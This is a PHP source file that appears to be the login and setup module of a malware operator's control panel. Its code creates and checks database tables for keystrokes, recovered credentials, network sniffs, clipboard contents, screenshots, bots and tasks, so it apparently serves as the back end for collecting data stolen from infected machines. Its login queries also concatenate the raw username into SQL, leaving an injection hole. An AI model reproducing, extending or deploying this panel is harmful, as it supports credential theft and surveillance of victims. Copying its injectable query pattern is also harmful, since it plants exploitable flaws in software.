<?php
define ('LOGIN_PAGE', 0); 
define ('LOGOUT_PAGE', 1);
define ('CRED_ERR_PAGE', 2);

function loginPage($page) 
{
    global $fb;
    loginform_str( $fb );
    $pageinfo = $fb->str['footer']."</form>";
    
    switch($page)
    {
        case LOGIN_PAGE:
            if( empty($fb->foundLanguage) )
            { 
                require_once "fb_GetLanguage.htm.php";
                installLanguage(); exit();
            }break;
        case LOGOUT_PAGE:
            $pageinfo = $fb->str['LoggedOut']; break;
        case CRED_ERR_PAGE:
            $pageinfo = $fb->str['failedLogin']; break;
    }
    show($fb->str['loginform'].$pageinfo, $fb->str['head_str']['login']);
}

function dbTableErr( $fb )
{
    show($fb->panel->str['bodyHeader'].$fb->panel->str['err']['dblogErr'].
            $fb->str['footer']."</div>", $fb->str['head_str']['db_err']);
}

function wrErr( $fb )
{
    show($fb->panel->str['bodyHeader'].$fb->panel->str['err']['wrErr'].
            $fb->str['footer']."</div>", $fb->str['head_str']['w_err']);
}

function fixTable( $fb, $table ) 
{
    require_once 'fb_DataBase.php';
    if( !isset($fb->panel->str['dbTable_str']) ) { $fb->panel->str['dbTable_str'] = dbTable_str(); }
    
    $result = mysqli_query($fb->mysql, $fb->panel->str['dbTable_str'][$table]);
    if( !$result )
    {
        dbTableErr( $fb );
    }
}

function LogIn($user, $pass)
{   
    global $fb;
    
    $cred_result = mysqli_query($fb->mysql, "SELECT * FROM cred WHERE `account` = '".$fb->account['name']."';");
    
    if( !$cred_result )
    {
        if ( strcasecmp($fb->account['user'],$user) != 0 || $fb->account['pass'] != $pass )
        {
            loginPage(CRED_ERR_PAGE);
        } 
        else { $_SESSION["name"] = $fb->account['user']; $fb->privilege = 3; }
    }
    else 
    {
        $row = mysqli_fetch_array($cred_result);
        if ( strcasecmp($fb->account['user'],$user) != 0 || sha1($pass) != $row["password"] )
        {
            if( !findUser($user,$pass) ) { 
                loginPage(CRED_ERR_PAGE); 
            }
        }
        else 
        { 
            if( isset($row["logtime"]) ) 
            { 
                $update = "UPDATE cred SET logtime='".date("Y-m-d H:i:s")."' WHERE account='".$fb->account['name']."';";
                mysqli_query($fb->mysql,$update);
            }
            $_SESSION["name"] = $fb->account['user']; $fb->privilege = 3; 
        }
    }
    
    getPanel($fb);
    for ($i = 0; $i < count($fb->panel->str['headList']); $i++){
        $_SESSION[$fb->panel->str['headList'][$i]."Page"] = 0;
    }
    
    $_SESSION["ip"] = server("REMOTE_ADDR");
    $_SESSION["user"] = $fb->account['user'];
    $_SESSION["sort"] = 4; $_SESSION["order"] = 1;
    
    $_SESSION["searchTable"] = "logs";
    $_SESSION["searchQ"] = NULL; $_SESSION["searchIn"] = NULL;
    
    $_SESSION["permErr"] = 0;
    $_SESSION["botinit"] = 1;
    $_SESSION["privilege"] = $fb->privilege;
    $_SESSION["err"] = $fb->panel->str['err']['permission_err'];
    
    $_SESSION["cur_dir"] = $fb->account['name'];$_SESSION["s_word"] = "";
    $_SESSION["fbc_dir"] = "script/"; $_SESSION["fbc_sort"] = 0;
    
    $tables_list = array();
    $tables = array("logs","keystrokes","recoveries","sniffs","clipboard","junk","screenshots",
            "blacklisted","geoip","bots","tasks","users","cred","vault","fbc","fbc_users","fbc_files");
    
    $tables_result = mysqli_query($fb->mysql, "SHOW TABLES");
    
    if( $tables_result ) {
        while($tRow = mysqli_fetch_array($tables_result) ) { $tables_list[$tRow[0]] = $tRow[0]; }
    }
    else { dbTableErr( $fb ); }
    
    for ($i = 0; $i < count($tables); $i++){
        if( !isset($tables_list[$tables[$i]]) ) {
            fixTable( $fb, $tables[$i] );
        }
    }
    
    if(!$cred_result)
    {
        $passQry = "INSERT INTO `cred` (`account`, `password`, `logtime`)
                    VALUES ('".$fb->account['name']."','".sha1($pass)."','".date("Y-m-d H:i:s")."');";
        $cred_result = mysqli_query($fb->mysql, $passQry);
        
        if (!$cred_result) 
        {
            dbTableErr( $fb );
        }
    }
    
    UpdateVault($fb);//UpdateVault comes checkGeoIP
    
    checkGeoIP($fb);
    
    $screen_path = "script/screen/";
    $fbc_path = $_SESSION["fbc_dir"].$_SESSION["cur_dir"];
    
    if( !is_dir($screen_path) && !mkdir($screen_path,0755,true) ) { wrErr($fb); }
    
    if( !is_dir($fbc_path) && !mkdir($fbc_path,0755,true) ) { wrErr($fb); }
    
    if( !is_file($fbc_path."/index") ) { createFbcIndex($fb); }
    
    mysqli_close($fb->mysql);//Debuger Bug in SqliDriver not fixable..
    header("Location: ?action=dashboard"); exit();
}

function LoadGeoIp()
{
    global $fb;
    ini_set('max_execution_time', 180);//3mins

    $geoPath = $fb->path['fb'].'zgeoip_Optional.data';
    $inst = "INSERT INTO `geoip` (`iplong_start`, `iplong_end`, `cnum`) VALUES ";
    $geoData = fopen($geoPath, 'r');

    while( $geoData && !feof($geoData) )
    {
        $geoip_insert = mysqli_query($fb->mysql, $inst.fgets($geoData).";");
        if(!$geoip_insert) 
        { 
            show($fb->panel->str['bodyHeader']."<h3>".$fb->panel->str['err']['geoIpErr']."</h3>".
            $fb->str['footer']."</div>", $fb->str['head_str']['db_err']);
        }
    }         
    mysqli_close($fb->mysql);//
    header("Location: ?action=dashboard&account=".GetAcc()); exit();
}

function findUser($user,$pass)
{
    global $fb;
    $result = mysqli_query($fb->mysql, "SELECT * FROM users WHERE `user` = '".$user."';");
    
    if( $result )
    {
        $row = mysqli_fetch_array($result);
        if($row)
        {
            if( strcasecmp($row["user"],$user) == 0 && sha1($pass) == $row["password"] )
            { 
                if( isset($row["logtime"]) ) 
                { 
                    $update = "UPDATE users SET logtime='".date("Y-m-d H:i:s")."' WHERE user='".$user."';";
                    mysqli_query($fb->mysql,$update);
                }
                $_SESSION["name"] = $row["user"]; $fb->privilege = $row["privilege"]; return true; 
            }
        }
    }
    return false;
}

function Perm($val)
{ 
    if( !isset($_SESSION["privilege"]) || $_SESSION["privilege"] < $val ) 
    {
        $_SESSION["permErr"] = 1; return false;            
    } return true;
}

function UpdateVault($fb)
{ 
    if( empty($fb->foundLanguage) ) 
    { 
        $fb->foundLanguage = "en"; 
        $fb->dbHandle['language'] = "en"; 
    }
    
    $vault_result = mysqli_query($fb->mysql,"SELECT * FROM vault WHERE `account` = '".$fb->account['name']."';");
    if( $vault_result )
    {
        if( !mysqli_num_rows($vault_result) ) 
        {
            return insertDB($fb, "vault", FALSE);
        }
        return updateDB($fb, "vault", array("account","language"));
    }
}

function createFbcIndex($fb)
{
    $result = mysqli_query($fb->mysql,"SELECT * FROM fbc WHERE `account` = '".$fb->account['name']."';");
    if( $result )
    {
        if( !mysqli_num_rows($result) ) 
        {
            insertDB($fb, "fbc", FALSE);
        }
    }
    
    $fbc_path = $_SESSION["fbc_dir"].$_SESSION["cur_dir"];
    if( !($fp = fopen($fbc_path."/index", 'w')) ) { wrErr( $fb ); }  
    fclose($fp);
    
    $dirResult = mysqli_query($fb->mysql, "SELECT * FROM fbc_files WHERE `file_dir` = '".$_SESSION["cur_dir"].
                "' AND `file_type` = '0' LIMIT 1;");
    
    if( !$dirResult || !mysqli_num_rows($dirResult) ) 
    { 
        $fb->dbHandle['file_dir'] = $_SESSION["cur_dir"];
        $fb->dbHandle['file_name'] = $_SESSION["cur_dir"];
        $fb->dbHandle['file_type'] = "0"; $fb->dbHandle['file_ext'] = "0";
        $fb->dbHandle['file_created'] = date("Y-m-d H:i:s", filectime($fbc_path));
        $fb->dbHandle['file_modified'] = date("Y-m-d H:i:s", filemtime($fbc_path));
        
        insertDB($fb, "fbc_files", FALSE);
    }
    
    $fileResult = mysqli_query($fb->mysql, "SELECT * FROM fbc_files WHERE `file_dir` = '".$fb->account['name'].
                "' AND `file_name` = 'index' AND `file_ext` = 'htm' LIMIT 1;");
    
    if( !$fileResult || !mysqli_num_rows($fileResult) ) 
    { 
        $fb->dbHandle['file_dir'] = $fb->account['name'];
        $fb->dbHandle['file_name'] = "index";
        $fb->dbHandle['file_type'] = "2";
        $fb->dbHandle['file_ext'] = "htm";
        $fb->dbHandle['file_created'] = date("Y-m-d H:i:s", filectime($fbc_path."/index"));
        $fb->dbHandle['file_modified'] = date("Y-m-d H:i:s", filemtime($fbc_path."/index"));
        
        insertDB($fb, "fbc_files", FALSE);
    }
}

function checkGeoIP($fb)
{ 
    $geo_result = mysqli_query($fb->mysql, "SELECT * FROM geoip LIMIT 1");
    if( $geo_result )
    {
        $geoip_row = mysqli_num_rows($geo_result);
    
        if( !$geoip_row ) 
        {
            $geoPath = $fb->path['fb'].'zgeoip_Optional.data';
            if( file_exists($geoPath) && is_readable($geoPath) )
            {
                require_once "fb_GeoIpLoad.htm.php"; installGeoIp( $fb);
            }
        }
    }
}

function LogOut()
{
    unset($_SESSION["user"]);
    unset($_SESSION["ip"]);
    unset($_SESSION["sort"]);
    unset($_SESSION["order"]);
    unset($_SESSION["page"]);
    unset($_SESSION["searchQ"]); 
    unset($_SESSION["searchIn"]);
    unset($_SESSION["searchTable"]);
    session_unset();
    loginPage(LOGOUT_PAGE);
}